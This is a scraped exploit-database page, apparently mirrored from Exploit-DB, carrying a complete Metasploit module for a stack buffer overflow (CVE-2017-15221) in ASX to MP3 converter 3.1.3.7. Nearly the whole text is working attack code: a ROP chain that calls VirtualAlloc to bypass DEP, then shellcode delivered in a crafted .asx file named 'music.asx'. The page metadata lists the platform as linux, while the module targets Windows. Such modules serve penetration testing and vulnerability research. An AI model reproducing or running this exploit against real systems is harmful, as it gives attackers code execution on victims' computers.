ASX to MP3 converter 3.1.3.7 – ‘.asx’ Local Stack Overflow (DEP Bypass) (Metasploit)

• Exploit Database
• 94 阅读

• 作者： max7253
  日期： 2019-10-10
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47482/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require &apos;msf/core&apos;   class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::FILEFORMAT   def initialize(info={}) super(update_info(info, &apos;Name&apos; => "ASX to MP3 converter 3.1.3.7 - &apos;.asx&apos; Local Stack Overflow (DEP)", &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7. By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Maxim Guslyaev&apos;, # EDB POC, Metasploit Module ], &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2017-15221&apos; ], [ &apos;EDB&apos;, &apos;47468&apos; ] ], &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows 7 Enterprise/10 Pro&apos;, { &apos;Ret&apos; => 0x1002D038 # RET } ] ], &apos;Payload&apos;=> { &apos;BadChars&apos; => "\x00\x09\x0a" }, &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Oct 06 2019", &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [true, &apos;The malicious file name&apos;, &apos;music.asx&apos;]) ]) end   def exploit   buf = "http://" buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"   ## Save allocation type (0x1000) in EDX buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN buf += [0x11111111].pack("V") buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN buf += [0x1002D493].pack("V") # POP EDX # RETN buf += [0xEEEEFEEF].pack("V") buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN buf += [0x41414141].pack("V")   ## Save the address of VirtualAlloc() in ESI buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll] buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll] buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN buf += [0x41414141].pack("V") buf += [0x41414141].pack("V")   ## Save the size of the block in EBX buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN   ## Save the address of (# ADD ESP,8 # RETN) in EBP buf += [0x10031c6c].pack("V") # POP EBP # RETN buf += [0x10012316].pack("V") # ADD ESP,8 # RETN #buf += [0x1003df73].pack("V") # & PUSH ESP # RETN   ## Save memory protection code (0x40) in ECX buf += [0x1002ca22].pack("V") # POP ECX # RETN buf += [0xFFFFFFFF].pack("V") buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN   ## Save ROP-NOP in EDI buf += [0x1002e346].pack("V") # POP EDI # RETN buf += [0x1002D038].pack("V") # RETN   ## Save NOPs in EAX #buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] #buf += [0x90909090].pack("V") # nop   ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address buf += [0x1002E516].pack("V") # POP EAX # RETN buf += [0xA4E2F275].pack("V") buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN buf += [0x10040ce5].pack("V") # PUSH EAX # RETN   buf += "\x90" * 4 buf += [0x1003df73].pack("V") # & PUSH ESP # RETN buf += "\x90" * 20 buf += payload.encoded   file_create(buf) end end